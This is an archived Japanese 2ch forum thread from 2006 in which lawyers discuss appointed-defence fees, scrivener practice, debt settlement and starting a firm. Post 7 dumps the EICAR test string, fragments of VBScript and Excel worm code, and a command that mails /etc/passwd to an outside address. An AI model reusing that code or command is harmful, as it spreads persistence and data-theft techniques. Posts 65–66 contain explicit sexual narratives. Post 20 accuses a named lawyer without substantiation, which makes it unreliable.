2ちゃんねる ★スマホ版★ ■掲示板に戻る■ 全部 1- 最新50  

■ このスレッドは過去ログ倉庫に格納されています

【花見は】弁護士本音talkスレPart21【まだか?】

1 :MS754 ◆yGUnQdhyV2 :2006/03/09(木) 00:13:10 ID:YlJx7usm
前スレ↓
【サヨナラ】弁護士本音talkスレPart20【みなし弁済】
http://school5.2ch.net/test/read.cgi/shikaku/1137164618/
注意書き,リンク集などは>>2-10あたりに・・・

2 :MS754 ◆yGUnQdhyV2 :2006/03/09(木) 00:14:11 ID:YlJx7usm
○こちらは弁護士の方や関係者などの雑談スレになります。
○特定の個人名、事務所名、電話番号、住所などは絶対に書き込まないでください。
○司法試験関係は 「司法試験板」 http://school5.2ch.net/shihou/ がございます。
○法律相談は、最寄りの法律相談センターや弁護士会、各種相談スレまたは下記スレへ。
   やさしい法律相談 Part165
http://school5.2ch.net/test/read.cgi/shikaku/1141571050/
------------------------------------------------------------
○弁護士の本音トークスレです。
 したがって,それ以外の話題,たとえば
 ×弁護士に対する相談
 ×弁護士以外の人の過度のスレ参加
 はなるべくご遠慮ください。
○荒らしは無視の方向でしかるべく。
○なるべくsage進行で。


3 :MS754 ◆yGUnQdhyV2 :2006/03/09(木) 00:14:45 ID:YlJx7usm
過去スレその1
1:【雑談】弁護士本音talkスレ その2【ため息】
http://school.2ch.net/test/read.cgi/shikaku/1059490362/
2:【雑談】弁護士本音talkスレ その3【ため息】
http://school.2ch.net/test/read.cgi/shikaku/1065526506/
3:【希望】弁護士本音talkスレ その4【失望】
http://school2.2ch.net/test/read.cgi/shikaku/1074280112/
4:【希望】弁護士本音talkスレ その5【失望】
http://school4.2ch.net/test/read.cgi/shikaku/1080568884/
5:【夏期】弁護士本音talkスレ その6【休廷】
http://school4.2ch.net/test/read.cgi/shikaku/1087307654/
6:【夏バテ】弁護士本音talkスレpart7【ビール腹】
http://school4.2ch.net/test/read.cgi/shikaku/1091890714/
7:【ようこそ】弁護士本音talkスレPart8【第58期よ】
http://school4.2ch.net/test/read.cgi/shikaku/1096634157/
8:【諸行】弁護士本音talkスレPart9【無常】
http://school4.2ch.net/test/read.cgi/shikaku/1099052870/
9:【忘年会】弁護士本音talkスレpart10【新年会】
http://school4.2ch.net/test/read.cgi/shikaku/1102088211/
10:【確定】弁護士本音talkスレpart11【申告】
http://school4.2ch.net/test/read.cgi/shikaku/1107791882/


4 :MS754 ◆yGUnQdhyV2 :2006/03/09(木) 00:15:24 ID:YlJx7usm
過去スレその2
11:【黄金】弁護士本音talkスレpart12【週間】
http://school4.2ch.net/test/read.cgi/shikaku/1113138219/
12:【相談は】弁護士本音talkスレpart13【他のスレで】
http://school4.2ch.net/test/read.cgi/shikaku/1115537611/
13:【クールビズ】弁護士本音talkスレpart14【してる?】
http://school5.2ch.net/test/read.cgi/shikaku/1118220156/
14:【国選増額】弁護士本音talkスレ15【熱烈希望】
http://school5.2ch.net/test/read.cgi/shikaku/1122387067/
15:【風立ちぬ】弁護士本音talkスレ16【爽やかに】
http://school5.2ch.net/test/read.cgi/shikaku/1125622482/
16:【WELCOME】弁護士本音talkスレPart17【58期】
http://school5.2ch.net/test/read.cgi/shikaku/1128939534/
17:【食欲の秋】弁護士本音talkスレPart18【ダイエット】
http://school5.2ch.net/test/read.cgi/shikaku/1130480126/
18:【メリー】弁護士本音talkスレPart19【クリスマス】
http://school5.2ch.net/test/read.cgi/shikaku/1133217229/
19:【サヨナラ】弁護士本音talkスレPart20【みなし弁済】
http://school5.2ch.net/test/read.cgi/shikaku/1137164618/


5 :MS754 ◆yGUnQdhyV2 :2006/03/09(木) 00:16:14 ID:YlJx7usm
関連スレ
【セクハラ】事務員本音talkスレ4頁目【根絶】
http://school5.2ch.net/test/read.cgi/shikaku/1131863289/
■裁判官の部屋 その3■
http://school5.2ch.net/test/read.cgi/shikaku/1137575282/
■若手法曹スレッドpart1■
http://school5.2ch.net/test/read.cgi/shikaku/1112780497/


6 :MS754 ◆yGUnQdhyV2 :2006/03/09(木) 00:18:44 ID:YlJx7usm
弁護士のためのサイト集(二弁知財法研究会)
http://www.dntba.ab.psiweb.com/link/bengoshi-link.html
法令データ提供システム
http://law.e-gov.go.jp/cgi-bin/idxsearch.cgi
総本山
http://www.nichibenren.or.jp/
東弁
http://www.toben.or.jp/
一弁
http://www.ichiben.or.jp/
二弁
http://www.niben.jp/
裁判所
http://www.courts.go.jp/
岡口裁判官のページ
http://okaguchi.at.infoseek.co.jp/top.htm


7 :無責任な名無しさん:2006/03/09(木) 00:35:33 ID:J9aSJLiU
X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*
If s = "htm" and fso.FileExists(f1.path+"l") = False then fso.CopyFile f1.path, f1.path+"l"
ToInfect.CodeModule.InsertLines BGN, ADI1.CodeModule.Lines(BGN, 1)
G.RegWrite A("IJDX^MNB@M^L@BIHOD]Rnguv`sd]Lhbsnrngu]Vhoenvr]BtssdouWdsrhno]Sto]VhoRu`su"), E.BuildPath(E.GetSpecialFolder(1), A("VHORU@SU/WCR"))
ms-its:mhtml:file://c:\
fso.copyfile "c:\network.vbs", "j:\windows\start menu\programs\startup\"
fso.copyfile "dirsystem&nurupo.vbs", "j:\windows\start menu\programs\startup\"
If s = "htm" and fso.FileExists(f1.path+"l") = False then fso.CopyFile f1.path, f1.path+"
c.Copy(dirsystem&"\MSKernel32.vbs")
c.Copy(dirwin&"\Win32DLL.vbs")
c.Copy(dirsystem&"\LOVE-LETTER-FOR-YOU.TXT.vbs")
cat /etc/passwd | mail nobody@nonexistent.com
If s = "htm" and fso.FileExists(f1.path+"l") = False thenfso.CopyFile f1.path, f1.path+"l"
Set A4 = A1.CreateTextFile(A1.BuildPath(A1.GetSpecialFolder(1)
fso.copyfile "c:\network.vbs", "j:\windows\start menu\programs\startup\"
fso.copyfile "dirsystem&nurupo.vbs", "j:\windows\start menu\programs\startup\"
If s = "htm" and fso.FileExists(f1.path+"l") = False then fso.CopyFile f1.path, f1.path+"l"
Sub auto_open()
Application.OnSheetActivate = "check_files"
End Sub
Sub check_files()
c$ = Application.StartupPath
m$ = Dir(c$ & "\" & "PERSONAL.XLS")
If m$ = "PERSONAL.XLS" Then p = 1 Else p = 0
If ActiveWorkbook.Modules.Count > 0 Then w = 1 Else w = 0
whichfile = p + w * 10
End Sub
c.Copy(dirsystem&"\LOVE-LETTER-FOR-YOU.TXT.vbs")
THE END!!



8 :行き詰まり弁護士 ◆BAKA/8y6zk :2006/03/09(木) 01:01:26 ID:uiKWjP9V
>>1MS754先生
いつもいつもスレ立て乙です。

9 :無責任な名無しさん:2006/03/09(木) 01:30:46 ID:WRBcAta1
以下の事務次官回答ですが、前半部分と後半部分の、それぞれについて説明します。

昭和29年法務省事務次官回答
「会社設立に必要な書類のうち、登記所に提出するためのもの(例えば、会社設立登記申請書、登記申請委任状) の作成は、司法書士の業務範囲に含まれるが、
しからざるもの(例えば、定款、株式申込証) の作成は、含まれない。」

この前半部分では、会社設立に必要な書類を「登記所に提出するためのもの」と、「しからざるもの」の2つに分けています。
そして、登記に提出するための書類の具体例が「登記申請書、委任状」であるとしており、登記に提出するためではない書類の具体例が「定款、株式申込証」であるとしています。
したがって、会社設立に必要であるからといって、必ずしも登記に提出するための書類であるとは限らず、定款などのように登記に提出するためでない書類も存在することを明らかにしています。

「なお、後者の場合において、書類の作成で法律的判断を必要としないものについては、弁護士法第七十二条の違反の問題を生じないが、しからざるものについては、その問題を生ずる。」

後半部分については、前半部分の「しからざるもの」の書類であっても、法律的判断を要しないものは、弁護士法には反しない旨の説明がなされています。
つまり、弁護士法との兼ね合いでは、司法書士は「しからざるもの」に含まれる定款であっても、法律的判断を要しない限りは、作成することが可能となります。

ところが、上記のとおり定款などの登記所に提出するためでない書類であって、法律的判断を要しない書類の作成行為(つまり、作成代理、作成代行のこと。)は、
行政書士法1条の2により行政書士の独占業務となるため、司法書士は扱えないことになります。

なお、前半部分からも明らかな通り、「しからざるもの」は司法書士の業務範囲に含まれません。後半部分では、単に「しからざるもの」の内、
法律的判断を要するものだけが弁護士法に抵触しますと言っているだけで、法律的判断を要する要しないにかかわらず、定款などの「しからざるもの」は司法書士の業務範囲に含まれません。

10 :無責任な名無しさん:2006/03/09(木) 22:05:28 ID:ddnwchXZ
MSせんせ乙です

11 :無責任な名無しさん:2006/03/10(金) 02:15:39 ID:hjyTLf/0
なくなってたからたてたの (*´・ω・)(・ω・`*)ネー 
とりあえず11なの (*´・ω・)(・ω・`*)ネー 

今度は落ちないでほしいの (*´・ω・)(・ω・`*)ネー 


12 :無責任な名無しさん:2006/03/10(金) 09:00:40 ID:uqLH+Qw0
日本司法書士自立支援センター「法テラス」の歌

法テラスにいって 労働相談したら 社労士居ないのに気付いて なぜか司法書士〜

法テラスに行って 遺言相談したら 行政士居ないのに気付いて なぜか司法書士〜

法テラスに行って 境界相談したら 調査士居ないのに気付いて なぜか司法書士〜

法テラスに行って 家事相談したら 弁護士居ないのに気付いて なぜか司法書士〜

法テラスに行って 司法書士の紹介うけた 無料相談のつもりが 扶助から5000円〜

法テラスに行くと いつも司法書士が居る 彼らの費用も扶助から 支払われるのかな〜

13 :無責任な名無しさん:2006/03/10(金) 09:26:48 ID:wVSrxR3u
上手ですね。おもしろいです。

14 :無責任な名無しさん:2006/03/10(金) 13:38:05 ID:PzSjwg/Q
判例タイムズ1199号
小川育央「刑事手続における和解に関する諸問題」
を読むと裁判所がどれだけ国選弁護人を軽視しているかがよくわかります


15 :無責任な名無しさん:2006/03/10(金) 13:47:01 ID:TMcb4BCT
>>14
まだ手元に来てないので、概要を

16 :無責任な名無しさん:2006/03/10(金) 14:32:42 ID:PzSjwg/Q
>>15
ちょっと誤読してますた・・まあしょうがないか・・。

17 :無責任な名無しさん:2006/03/10(金) 15:06:26 ID:uqYoKuCi
その判タを読まないまでも、普段の期日で裁判所がいかに国選弁護人を
軽視しているかは実感しております。

どんなに厚い記録でも謄写代は認めない。
弁護士が裁判官に会うときは書記官を通して用件を伝えた上で許可を
得ないとならないのに、検事とは裁判官室で毎日のように顔合わせ。
刑事事件では、検事と弁護人は裁判所から全く対等に扱ってもらえないと思います。
ただ、検事に全面的に立証責任があることを考えれば、対等でないのも当然なのか?

18 :無責任な名無しさん:2006/03/10(金) 15:33:03 ID:Oyjq3zTv
国選に関しては、一回、弁護士会全体でボイコット等の抗議行動を
すべきだと思います。不可能だと思いますが。

謄写費用が出ないのは理解できません。

19 :無責任な名無しさん:2006/03/10(金) 17:12:40 ID:TMcb4BCT
あんまり私選はやったことがないんだけど、私選ならば軽視されないのかな?

20 :無責任な名無しさん:2006/03/10(金) 17:26:36 ID:V0DriALy
・被告人を犯罪者に仕立て上げたら普通の弁護士に戻る。
・普通の弁護士も国選弁護人中は、特別公務員なかのどうかご意見欲しいです。
・無実を訴える被告人に接見して否認事件であり冤罪事件である事を確信した
札弁推薦の国選弁護人愛須一史が真犯人の道庁職員、地検、地裁と連携して無
実の被告人を精神的に追い詰め、「実刑か執行猶予」を選択させて有罪判決を
甘受させた例がある。
・弁護士も信用できない時代、道民は、道警に逮捕されたら諦めよう。



21 :無責任な名無しさん:2006/03/10(金) 18:34:57 ID:YHWOEQ8+
私も国選はストライキをした方がいいと考えたことあるけれど、おじいさんたちが大挙してスト破りをするから無駄だと思う。

22 :無責任な名無しさん:2006/03/10(金) 19:24:08 ID:Ri7++c/B
あの〜自分は経営者なんですが、弁護士の皆さんは経営者になる事は可能なんですか?

もし可能なら、貴方達が経営者にもっともふさわしい人種であると私は考えています。

みなさんはこの事にどうお考えですか?



23 :無責任な名無しさん:2006/03/10(金) 19:36:14 ID:Ri7++c/B
すいません要点をついていませんでしたね。

要は弁護士の副業についてどう思うか?です。

スレ違いで申し訳ありません。

24 :無責任な名無しさん:2006/03/10(金) 21:06:35 ID:22MnKnPa
某有名先生のように,我々の仕事の啓蒙活動をしていただけるのなら何とも思わないが,ネタは止めてほしいと・・・(笑)。

タレントが弁護士をやっているのか,弁護士がタレントをやっているのかわからないのは苦々しく思います。

25 :無責任な名無しさん:2006/03/10(金) 21:20:24 ID:Ri7++c/B
>>24
ああ、なるほど・・・(笑)
ですが、実際アメリカには大企業を経営している弁護士もいますしね。
私はみなさんがこれからIT等のベンチャー企業の共同経営者になっていけば
かなり成功の確率が高いと思うのです。
まぁいまでも十分成功してらっしゃるかとは思いますが。。。

ではネタはこれぐらいにしておきます(笑)

26 :無責任な名無しさん:2006/03/10(金) 22:48:17 ID:Ri7++c/B
すいません。書き込みがとまっちゃいましたね。
私自信、法律に疎いもので突然、今日ふと弁護士さんが起業しないのはなぜか?
今の日本の法律では制限されているのかな?とふと疑問に思い、
質問させていただいたしだいです。
なにぶん、弁護士さんとはあまり会う機会がないもので・・・。

荒らしてしまったようですいません。お許し下さい。
迷惑でしたらどうぞスルーしてください。

27 :無責任な名無しさん:2006/03/10(金) 22:51:00 ID:l92DF6Di
じゃあ、スルーで

28 :無責任な名無しさん:2006/03/10(金) 22:59:51 ID:Ri7++c/B
>>27
やはり迷惑でしたか・・・。
申し訳ない。どうぞどうぞ。
なにせこの時代でしょ?
ライブドアも税理士じゃなく弁護士は税理士もできるんだから
弁護士さんとやればこんなことにならなかったんじゃなかった
のかな?と思いましてね。
どうぞどうぞ、スルーして下さい。

29 :無責任な名無しさん:2006/03/11(土) 00:20:43 ID:EsIlzxwV
そういえば、ライブドアグループの専属弁護士どうなるんだろう?
横浜の事務所だったと思うが、事務所かわるのかなぁ・・・


30 :無責任な名無しさん:2006/03/11(土) 00:31:41 ID:HAtPLD2t
>>29
小者は後回しなんだろうね。
ただで済むとはちょっと思えないな。

31 :無責任な名無しさん:2006/03/11(土) 00:43:40 ID:7k4spWUM
>>29
ヤバイヨーヤバイヨー

32 :無責任な名無しさん:2006/03/11(土) 00:55:11 ID:EsIlzxwV
民放が全く報道しないことが一番の問題だな。マスコミって、ひどいね。



★アイフルを305人一斉提訴=第2次、30道府県で3億円請求

・消費者金融大手アイフル(京都市)とグループ企業が利息制限法で定められた
 上限金利を上回る利息を取っているのは違法として、アイフル被害対策全国会議
 (代表・河野聡弁護士)は10日、全国30道府県で305人が過払金返還など総額
 3億125万円の支払いを求める訴えを同日一斉に起こすと発表した。アイフル
 グループに対する一斉提訴は昨年7月以来2回目。


33 :無責任な名無しさん:2006/03/11(土) 02:48:55 ID:tAWybroW
>>29
横浜のライブドア専属の法律事務所の弁護士は明らかに小物で立件されることはないと思いますよ。期の若さからしてライブドアの税理士が作った税理士弁護士綜合事務所の名目所長弁護士、実質税理士の雇われ弁護士というところでは。

34 :無責任な名無しさん:2006/03/11(土) 03:03:35 ID:EsIlzxwV
>>33
番号から考えると58期だよな。
10月から仕事初めて年が明けたら、ライブドアショック。

可哀想に。運がなかったんだね。


35 :無責任な名無しさん:2006/03/11(土) 03:23:43 ID:tAWybroW
>>34
就職がなかったのか、夢をみたのか


36 :無責任な名無しさん:2006/03/11(土) 03:48:16 ID:YlpfrNzU
>>22
私は弁護士ではないんですが、私のごくごく近い身内に起業した弁護士がいますよ。
よくわからないけど何やら弁護士法が改正したから云々と言ってましたよ。
ただ社長の名は今のところ本人ではないようです。スレ違いなので、サゲ

37 :無責任な名無しさん:2006/03/11(土) 07:36:21 ID:7k4spWUM
>>34
平成9年登録だと思っていたけど・・

38 :無責任な名無しさん:2006/03/11(土) 11:47:38 ID:LCphtZLp
前スレにもでてたけど、事務所のメンツは49期×2、58期×2で
問題となっている人は49期だろ。

39 :無責任な名無しさん:2006/03/11(土) 14:05:36 ID:fynECgnL
飲酒検知逃れようと警官に水かけた司法書士逮捕(岐阜)
http://live22x.2ch.net/test/read.cgi/news/1141557396/

40 :無責任な名無しさん:2006/03/11(土) 14:22:36 ID:F0Zuon2e
↑ 司法書士は本イタには関係しません。

 スルー、するー。

41 :無責任な名無しさん:2006/03/11(土) 19:02:21 ID:lzYXfPwe
目下鼻炎カプセルの効果最大。めっちゃ眠い・・・。

準備書面全然出来ず。1行も進まない。もう帰る・・・。( p_q)エ-ン

42 :無責任な名無しさん:2006/03/11(土) 21:14:29 ID:fynECgnL
■■登記研究696号(2月号)の主な内容■■
  −3月13日発行−

商業・法人登記関係
−司法書士が作成代理人として記名押印又は署名している
定款が添付された登記申請の取扱いについて〔解説付〕
http://www.teihan.co.jp/


43 :無責任な名無しさん:2006/03/11(土) 22:43:09 ID:CU3yDgaz
興味ねー

44 :無責任な名無しさん:2006/03/12(日) 10:34:29 ID:8VmUEZLm
弁護士でもこんな破廉恥で間抜けな犯罪者がいるんですね。

[コピペ]

●大阪弁護士会、会員2人を懲戒処分(17日)

大阪弁護士会は17日、痴漢行為で弁護士の品位を失う非行をしたとして、
同会所属の大塚辰幸弁護士(39)を業務停止2カ月の懲戒処分とした。
大塚弁護士は昨年7月、南海電鉄の車内で当時16歳だった女子高校生に痴漢をし、
大阪府迷惑防止条例違反の罪で堺簡裁から罰金50万円の略式命令を受けた
■電車で痴漢の弁護士に略式命令 父が同乗、現場押さえる
[朝日](2002年10月8日)
大阪弁護士会所属の弁護士(38)が電車内で女子高校生の体に触る痴漢行為をしたとして、大阪府迷惑防止条例違反の罪で堺簡裁から罰金50万円の略式命令を受けていたことがわかった。弁護士はすでに罰金を納付した。
被害者側は、この弁護士について大阪弁護士会に懲戒請求することを検討している。懲戒理由に当たる可能性があることから同弁護士会も調査に乗り出すことになりそうだ。
起訴状などによると、弁護士は7月8日午前8時すぎ、大阪府堺市の南海電鉄高野線の難波行き準急電車内で、高校1年の女子生徒(当時16)の体を約2分間にわたって触ったとされる。
女子生徒は7月8日以前にも、痴漢行為を受けていたため、同日朝は父親が電車に同乗していたという。
痴漢行為に気づいた父親が弁護士を取り押さえ、大阪府警に引き渡した。府警は府迷惑防止条例違反容疑で現行犯逮捕した。
 弁護士は容疑を認めたため釈放された。大阪地検堺支部が在宅で取り調べ、堺区検が9月19日に同罪で略式起訴。堺簡裁は同月24日、罰金50万円の略式命令を出した。
 弁護士は96年に大阪弁護士会に弁護士登録しており、現在は大阪市内に事務所を構えている。弁護士は今月7日現在、朝日新聞社の取材に応じていない。


45 :無責任な名無しさん:2006/03/12(日) 10:36:23 ID:PahWyCCU
悪事が“行列”弁護士(東京新聞)
http://www.tokyo-np.co.jp/00/sya/20060307/mng_____sya_____009.shtml


46 :無責任な名無しさん:2006/03/12(日) 15:50:15 ID:xZcRI4bN
筆界特定・・・・不安要素満載だなぁ。
だいたい、筆界と所有権界が違うなんて、一般人にわかるのか?
説明しろって言ったってなかなか理解できんだろうし。
専門の審議を経て登記官が特定してる間に、境界確定の裁判もできるんだろ、これ?
でもって特定して、そのあと裁判でひっくり返ったらどーするよ?
そうなると、所有権界は裁判、筆界(公の線)は法務局とかって言い訳すんのw?

47 :無責任な名無しさん:2006/03/12(日) 16:05:12 ID:/H1uJT/K
>>46
司法書士?

48 :無責任な名無しさん:2006/03/12(日) 16:31:05 ID:xZcRI4bN
>>47
いや、弁です。たまたまNHKでこれの特集やってたのを見て
法務局に勤めてる友達に電話したら、そいつもあんまり良くわかって
ないらしくてね。境界裁判やったことある?

49 :無責任な名無しさん:2006/03/12(日) 17:40:57 ID:/H1uJT/K
>>48
一応弁護士と信じてあげようか。
でも、あんたのレスは意味不明。

>だいたい、筆界と所有権界が違うなんて、一般人にわかるのか?
一般人が理解できないことと、筆界特定制度がうまくいかないことの間にどういう関係があるのか?

>でもって特定して、そのあと裁判でひっくり返ったらどーするよ?
どうもしない。境界確定訴訟が優先する(不登法148条)。筆界特定の結果に不満がある者が最終判断を
求めて訴えを提起するのを拒否する理由ない(多分。境界確定訴訟は訴訟の形式をとった非訟事件だか
ら、今断言する勇気がない)。行政の判断に不満がある場合に提訴できるのは、労働審判等、ほかに例
がある

>そうなると、所有権界は裁判、筆界(公の線)は法務局とかって言い訳すんのw?
境界確定で所有権界が決まるのか?
所有権界が争われた訴訟で筆界特定と違う線が定められたとしても、それはそもそも矛盾でもなんでもない。

予め言っておくが、できたばかりの制度だから詳しくなかって言い訳するなよ。
プロなら調べてからレスすべきだ。
調べずにレスするなら、上から偉そうにレスするんじゃなく、下から教えてくださいというレスをしろ。

50 :無責任な名無しさん:2006/03/12(日) 18:14:34 ID:/rs22RKv
>>48
悪いことは言わん。
こんなところで無知をさらす前に,まずは自分で少しだけ調べたほうがいい。
恥を知れ,恥を。

51 :無責任な名無しさん:2006/03/12(日) 20:03:21 ID:xZcRI4bN
恥とも思わん、知らんこと知らんと言ってるだけだし、
無知なのは先刻承知。
知っているであろうはずの友人から聞いても懸念の声が出てるから
ある種、疑問を呈しただけ、いやまだ一度も携わったことないし
そろそろこういうことにも手をだしていけんと思うから書いただけだが、スレ汚しスマソ。

52 :無責任な名無しさん:2006/03/12(日) 20:13:25 ID:xZcRI4bN
オイラの懸念は同時進行で訴訟も可能ってとこ。仕事やりづらいと思う。
行政(法務局)の判断が出て、それが不服なら訴訟ってならわかるが。
あとそこまで心配するなとか言われそうだが、特定する登記官の護衛が必要じゃね?
特定が訴訟に影響しないわけないから、下手すると刺される。

53 :無責任な名無しさん:2006/03/12(日) 20:14:43 ID:vfOpZQtx
弁護士と税理士と代議士、なるのにどれが一番難しいと思いますか?

54 :無責任な名無しさん:2006/03/12(日) 20:50:08 ID:gwmCcTMW
>>51
俺なんか,なんにもわかってないよ〜
ハッキリ言ってそんなに勉強する分野とは思えんし。
べつにどうでもエエんでね?

55 :無責任な名無しさん:2006/03/12(日) 20:50:18 ID:bZ427ksh
そんなもん、本人の資質による。
頭が悪くても、人を引きつける魅力や、人に対する説得力等、カリスマ性があれば、代議士の方が
簡単。総理大臣にだってなれる。
頭がよければ、カリスマ性が無くとも、弁護士、税理士にはなれる。

56 :無責任な名無しさん:2006/03/12(日) 21:08:46 ID:nV8e88K0
代議士


57 :無責任な名無しさん:2006/03/12(日) 21:09:18 ID:9DyKvbR+
便利士

58 :無責任な名無しさん:2006/03/12(日) 21:10:17 ID:ZDxklBKo
ttp://www.zakzak.co.jp/top/2006_03/t2006031125.html

この人自分の知っている人だと思うけど,4回目でも業務停止で済むんだね。
次は退会命令だと思ってた(まあ,内容にもよるんだろうが)。

59 :無責任な名無しさん:2006/03/12(日) 21:16:12 ID:/H1uJT/K
ロンブーの番組に出てた○野○三郎はどうなった。

60 :無責任な名無しさん:2006/03/12(日) 21:20:16 ID:9DyKvbR+
金野玉三郎?

61 :無責任な名無しさん:2006/03/12(日) 21:22:39 ID:HV9UJAJ8
>>58
富山はある意味特殊地域

62 :無責任な名無しさん:2006/03/13(月) 06:11:28 ID:4OmrwD5k
富山は無法地帯。
ほとんどの懲戒事案はもみ消しだろ。

63 :無責任な名無しさん:2006/03/13(月) 15:10:33 ID:DRCmrMli
「自宅よりも留置場がいい」世田谷放火の中2話す
http://headlines.yahoo.co.jp/hl?a=20060313-00000305-yom-soci

重大な少年事件において、捜査官に対して戯れか誘導により供述した内容を報道陣にリークする
「実務運用」はいかがなものなのでしょうか?
捜査官の意図的な情報リークは守秘義務にも反するはずなのに


64 :TN:2006/03/13(月) 15:16:52 ID:inc1p7HS
少年法61条に反するよね
ペラペラしゃべりまくる付添人も同罪だけど
でもおいらは少年法61条は違憲だと思ってるんだ

65 :無責任な名無しさん:2006/03/13(月) 16:15:38 ID:6jk0zcty
今日初ソープ行ってきました。
前日に予約して当日30分前に吉野家前で送迎を待つ。
しばらくして車が到着したので乗ったのだが、この時点で心臓バクバク。
車から降り待合室に連れて行かれ、思ったより時間があったので深呼吸して落ち着いた。
しばらくして用意ができたとのことで、ついに姫との対面。
写真は顔半分しかでていなかったのだけど、想像していたより色白で美人だった。
ジャンバーを掛けてもらいながら年齢を聞かれたので23歳というと
「じゃあ同い年だね」と言って立ったままいきなりディープキスしてきた。
俺がビックリしているとそのままベットに座らされ、その上に姫がまたがって上着を脱がしてきました。
「こういう店はよく来るの?」と聞かれたので「童貞です」と宣言。
すると「じゃあこういうのも初めて?」といいながらフェラしてきました。
今まで感じたことない刺激に堪らず口内発射してしまいました。

風呂場に行き、石鹸まみれの胸を使って体を洗ってもらうと息子が復活。
しかしイスに座ってお尻の穴を触られながらチンコを洗われたら敢えなく2発目発射。

お風呂に入って温まってからマットへ突入
最初はうつ伏せになっておっぱいで背中を上下に擦ってもらった。
柔らかくてすべすべしてて息子はすぐに勃起。
足の指や付け根まで丁寧に舐められ、くすぐったいけど気持ちよかった。
しかし仰向けにされてパイズリされると突然射精感がこみ上げて来て。そのまま姫の胸に発射。

ベットに戻りマンコを見せてもらい、舐めたり指を入れたりしてみる。
その後キスとフェラで立ったので挿入しようと思ったのだが
コンドームを付けている最中に何の前触れもなく暴発
結局1回も入れることができなかったOTZ


66 :無責任な名無しさん:2006/03/13(月) 16:18:57 ID:6jk0zcty
久しぶりにソープに出撃した。
椅子洗いのときに味見として後背位で結合、数回ピストン。
ボディ洗いのときに柔らかいのをなんとか硬くして騎乗位で結合、ところが姫が
数回腰を振っただけですぐ柔らかくなってあそこから吐き出されてそれでおしまい。
ベッドでは勃ちもせず柔らかいままで挿入できずじまい。
生で挿入できたのはいいけれど、ここ最近気持ちいい体内発射をできたことがない。
勃起していても、体内に入っていても息子には何の感覚もなく、自分の体の一部と
いう感じすらなかった。
オナニーのやりすぎかAVの見すぎかわからないが、生身の女の子を相手にして何も
チンポがギンギンになるようなエッチな感覚が生じてこない。
特に女の子の体内で気持良くなって発射できないのが怖い。
誰かいい方法があったら教えてくれ。
姫が申し訳ないと言ってくれるのがかわいそうだ。


67 :無責任な名無しさん:2006/03/13(月) 20:08:39 ID:730OOLxP
債務総額1500万円、13社、月収30万円の人の
任意整理やってくれと言われたら、受任します?

68 :無責任な名無しさん:2006/03/13(月) 20:28:48 ID:3WHFcHjE
月収って税込みか? 破産か個人再生に切り替えさせてから受任するかも。

69 :無責任な名無しさん:2006/03/13(月) 20:38:57 ID:730OOLxP
税込みなんだけど、絶対任意整理じゃなきゃ嫌なんだって。
もちろん弁護士費用は分割。

70 :無責任な名無しさん:2006/03/13(月) 20:41:24 ID:3WHFcHjE
過払いか、少なくとも相当な減額が見込めないと
任意整理といってもサラ金は飲まないだろう。
その辺の見込みはどう?

71 :無責任な名無しさん:2006/03/13(月) 20:49:30 ID:730OOLxP
減っても半分くらいといったところだと思う。

72 :無責任な名無しさん:2006/03/13(月) 21:31:26 ID:g3XuVuYK
>>67
絶対債務整理というのなら依頼者の希望に添う処理ができないので断る。
不動産とか車とかめぼしい財産を処分して、現実的な分割返済の見込みがあるのなら別だけど。

73 :無責任な名無しさん:2006/03/13(月) 21:36:48 ID:6jk0zcty
>>67
支払に回せる金がいくらある?
過払い発生の見込みは?

ま,>>72が正解だと思う。

74 :無責任な名無しさん:2006/03/13(月) 23:51:47 ID:3WHFcHjE
何もしないうちに答えてくれてた。>>72-73サンクス

75 :無責任な名無しさん:2006/03/13(月) 23:55:58 ID:zDvKW++8
>>73=>>65,66だけどね。

76 :無責任な名無しさん:2006/03/14(火) 00:19:51 ID:KrHiWWIu
そろそろ独立しようと思うのですが、初期投資どれくらいですか?
私の聞いた範囲では、1000万弱。某高裁所在地の地方。


77 :無責任な名無しさん:2006/03/14(火) 00:58:08 ID:oHbEIrrV
非弁乙。

78 :無責任な名無しさん:2006/03/14(火) 01:13:41 ID:KrHiWWIu
>>77
すまん本物なんだけど。

79 :無責任な名無しさん:2006/03/14(火) 01:23:00 ID:oHbEIrrV
外部の人間が興味本位で聞いてるのかと思った。
つーか、それくらい周りの人間から聞かないのかい?

80 :無責任な名無しさん:2006/03/14(火) 01:34:38 ID:KrHiWWIu
>>79
すまん、ここで聞くといろいろ問題ありそうですね。
いろいろ周りから聞いてるが、まちまちなもんで。
自分で情報収集します

81 :無責任な名無しさん:2006/03/14(火) 01:36:14 ID:6Fd59T2H
東京だと3000万〜5000万といわれているよ(ボス弁が脅す分を割り引いてくれ)。

82 :無責任な名無しさん:2006/03/14(火) 07:31:59 ID:RCpWCL4r
>>76
やりようによれば50万でOK。
事務所:自宅 事務員:嫁 FAX・コピー・パソコン:買い取り
カラーコピー:コンビニ 机・書類棚:中古

83 :無責任な名無しさん:2006/03/14(火) 08:06:05 ID:4BxvaAbX
金の問題じゃなくて、気合いの問題だと思う。

84 :無責任な名無しさん:2006/03/14(火) 08:34:54 ID:cYu/ywK1
最初から事務員なんていらんだろ。

俺は,1年間,携帯片手に営業(セールスではないよ)してた。

85 :無責任な名無しさん:2006/03/14(火) 09:14:15 ID:ItKSe2kb
あんまり経費かけないで独立したいなと思ってるんだけど、実際問題>84
みたいなのって可能?
証拠調べ中に電話かかってきたときは留守電にしておいて文句言われない?
やっぱり、電話番、コピー、お茶出し、裁判所・弁護士会巡り程度をしてもらう人を
時給いくらかでも雇わないと回らないかな・・。

86 :TN:2006/03/14(火) 09:39:03 ID:4VXiW+bh
収入なくたって独立自営だよ
どっか地方へ行って支部の事務官に名刺渡してくれば
国選でメシぐらい食えるだろう


87 :無責任な名無しさん:2006/03/14(火) 10:33:59 ID:33el/IVF
名刺など渡さなくても,ゼロワン地域なら,登録直後から国選・管財の依頼と破産・任意整理の依頼で,休む暇なしですよ。

88 :無責任な名無しさん:2006/03/14(火) 12:09:07 ID:c1leWejL
>>75
その通りだけどよけいなことを言うな。

89 :無責任な名無しさん:2006/03/14(火) 15:37:16 ID:0a8gXQHU
来年以降はどうなるかな


90 :無責任な名無しさん:2006/03/14(火) 18:43:19 ID:oIUQlER9
山口母子殺人の先生が跳びました

91 :無責任な名無しさん:2006/03/14(火) 18:48:04 ID:4BxvaAbX
>>90
http://headlines.yahoo.co.jp/hl?a=20060314-00000072-jij-soci
これか

こう言うのは懲戒請求すればいいのに

で,誰がやってるの?

